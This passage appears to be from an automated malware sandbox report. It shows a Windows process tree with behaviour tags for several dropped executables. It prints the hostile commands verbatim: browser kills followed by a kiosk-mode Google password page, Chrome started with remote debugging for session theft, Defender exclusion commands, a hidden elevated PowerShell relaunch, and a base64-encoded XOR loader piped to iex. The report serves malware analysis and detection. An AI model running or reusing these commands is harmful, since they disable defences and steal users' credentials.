                                        • Uses browser remote debugging
                                        PID:3840
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:5156
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,15995237194227425284,10780105890904617681,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
                                        5⤵
                                        • Uses browser remote debugging
                                        PID:5748
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ngv37" & exit
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:7816
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 11
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Delays execution with timeout.exe
                                        PID:7628
                                  • C:\Users\Admin\AppData\Local\Temp\10127840101\17df09620c.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127840101\17df09620c.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2568
                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      4⤵
                                      • Downloads MZ/PE file
                                      • System Location Discovery: System Language Discovery
                                      PID:4452
                                  • C:\Users\Admin\AppData\Local\Temp\10127850101\8323f7acef.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127850101\8323f7acef.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5488
                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                      4⤵
                                      • Downloads MZ/PE file
                                      • System Location Discovery: System Language Discovery
                                      PID:4480
                                  • C:\Users\Admin\AppData\Local\Temp\10127860101\787a5f5ef6.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127860101\787a5f5ef6.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:6008
                                  • C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:4236
                                    • C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10127870101\3bd8e48c7d.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:6116
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 788
                                      4⤵
                                      • Program crash
                                      PID:5312
                                  • C:\Users\Admin\AppData\Local\Temp\10127880101\ec6d990530.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127880101\ec6d990530.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Downloads MZ/PE file
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:7768
                                    • C:\Users\Admin\AppData\Local\Temp\FR5MVRFWWK6EPYHEW9UM6Y.exe
                                      "C:\Users\Admin\AppData\Local\Temp\FR5MVRFWWK6EPYHEW9UM6Y.exe"
                                      4⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      PID:5484
                                  • C:\Users\Admin\AppData\Local\Temp\10127890101\49afafb5a2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127890101\49afafb5a2.exe"
                                    3⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    PID:8164
                                  • C:\Users\Admin\AppData\Local\Temp\10127900101\ae85dec50f.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10127900101\ae85dec50f.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:6460
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM firefox.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6424
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM chrome.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6384
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM msedge.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2780
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM opera.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6580
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM brave.exe /T
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5516
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                      4⤵
                                        PID:6412
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                          5⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          • Suspicious use of SetWindowsHookEx
                                          PID:6400
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2b700e2-e7b6-4a17-a568-2f05c8ad2470} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" gpu
                                            6⤵
                                              PID:6532
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {683e45a2-ddef-429b-8827-5d97843d9b58} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" socket
                                              6⤵
                                                PID:5400
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1408 -childID 1 -isForBrowser -prefsHandle 3108 -prefMapHandle 2672 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c9fc7d2-95cd-4dda-95e9-3446da612fd2} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab
                                                6⤵
                                                  PID:7988
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2756 -childID 2 -isForBrowser -prefsHandle 3936 -prefMapHandle 3932 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee493899-3a7e-4fcc-be13-8b3a18f4a051} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab
                                                  6⤵
                                                    PID:7612
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4656 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4620 -prefMapHandle 4608 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e2c7c48-45e4-455b-ad85-d05d410a0522} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" utility
                                                    6⤵
                                                    • Checks processor information in registry
                                                    PID:2032
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -childID 3 -isForBrowser -prefsHandle 5160 -prefMapHandle 5172 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {911ec1e8-f885-4008-a46c-2183b5b202b7} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab
                                                    6⤵
                                                      PID:5856
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5188 -childID 4 -isForBrowser -prefsHandle 5344 -prefMapHandle 5320 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2310d52f-12bb-49df-9744-83d9d8239507} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab
                                                      6⤵
                                                        PID:6780
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 5 -isForBrowser -prefsHandle 5160 -prefMapHandle 5352 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf8880d9-81a7-4809-b669-61f98ddc361a} 6400 "\\.\pipe\gecko-crash-server-pipe.6400" tab
                                                        6⤵
                                                          PID:6816
                                                  • C:\Users\Admin\AppData\Local\Temp\10127910101\4135398cf6.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10127910101\4135398cf6.exe"
                                                    3⤵
                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    • Modifies Windows Defender TamperProtection settings
                                                    • Modifies Windows Defender notification settings
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Windows security modification
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2468
                                                  • C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    PID:4236
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                      4⤵
                                                      • Uses browser remote debugging
                                                      • Enumerates system info in registry
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:8120
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe57d1cc40,0x7ffe57d1cc4c,0x7ffe57d1cc58
                                                        5⤵
                                                          PID:6836
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2016 /prefetch:2
                                                          5⤵
                                                            PID:7216
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2068 /prefetch:3
                                                            5⤵
                                                              PID:2992
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2476 /prefetch:8
                                                              5⤵
                                                                PID:7388
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:6228
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:7212
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:1
                                                                5⤵
                                                                • Uses browser remote debugging
                                                                PID:6588
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8
                                                                5⤵
                                                                  PID:5444
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:8
                                                                  5⤵
                                                                    PID:6080
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:8
                                                                    5⤵
                                                                      PID:6656
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4968 /prefetch:8
                                                                      5⤵
                                                                        PID:7008
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4996 /prefetch:8
                                                                        5⤵
                                                                          PID:7608
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:8
                                                                          5⤵
                                                                            PID:5236
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:8
                                                                            5⤵
                                                                              PID:2880
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5148 /prefetch:8
                                                                              5⤵
                                                                                PID:4828
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5160,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:2
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:4116
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd"
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6572
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:7360
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd" sgcCUaUFtA
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6060
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                                                                  6⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2492
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                                                                    7⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:7036
                                                                          • C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            • Enumerates system info in registry
                                                                            PID:6796
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:216
                                                                            • C:\Program Files\runtime\COM Surrogate.exe
                                                                              "C:\Program Files\runtime\COM Surrogate.exe"
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • NTFS ADS
                                                                              PID:3892
                                                                              • C:\Windows\system32\net.exe
                                                                                "net" session
                                                                                5⤵
                                                                                  PID:1136
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 session
                                                                                    6⤵
                                                                                      PID:6364
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell" -EncodedCommand JAB5AHAAdgBuAHkAawBjAHMAPQAnAFAAMwBRADAASwBTAEkASgBaAEIAawBFAEEAaABzAFkATQAzAFUAdwBPAHkASQBlAGQAeABvAHoAZQBUAFUAQwBDAFMAawBvAEwAaABzAHcAVABSADQAWQBDAFcAQQBzAEMAUwBvAEMAYwBDAE0AdwBZAHgAZwAxAEQAeQBrAGUAQwBYAFEAMwBKAGcAcwBlAEIAQwBrAHoAZQBHAEEAYQBNAHgAQgBUAEsAZwBnAGkAYwB3AFkATABDAFcAQQBnAEMAUQBFAGsATwBCAHMAdwBiAHcARQB5AEoAdwBjAGIATQAzAFUAegBKAGcAMAB5AFkAMQBrAEkAZQBDAGwAZgBDAFgAVQBLAE4AeQBNAEwAZAB3AFUAMQBEAFQAWQBKAEkARAA0AEMAQgBRADQATABUAFQAcwB5AGUAQQBjAFgAQwBYAFkAZQBBAHgAcwBnAEIAQgAwAHoASQB6AEkAQQBJAEQANABuAE4AUgBjAEsAWQB4AFEASQBJAHgATQA5AEQAaABCAFQAQQB5AEkAZQBkAEIAawBIAGUARAAwAGIATQBBAEIAZgBjAGgAUgBVAFoAMQBnAHoARABRAFEASgBPAFEAQQBLAEsAaABzAGcAWQB4AGcAPQAnADsAJAByAHEAcwBxAGMAZwBnAHoAPQAnAGoARwBmAEEAQQBnADUAbQBRAEoAUQBuACcAOwAkAGwAdQBmAG4APQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAeQBwAHYAbgB5AGsAYwBzACkAOwAkAGEAawBvAHkAaABpAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAGwAdQBmAG4ALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAbAB1AGYAbgBbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHIAcQBzAHEAYwBnAGcAegBbACQAaQAlACQAcgBxAHMAcQBjAGcAZwB6AC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAawBvAHkAaABpACkAKQB8AGkAZQB4AA==
                                                                                    5⤵
                                                                                      PID:5956
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                        6⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:436
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
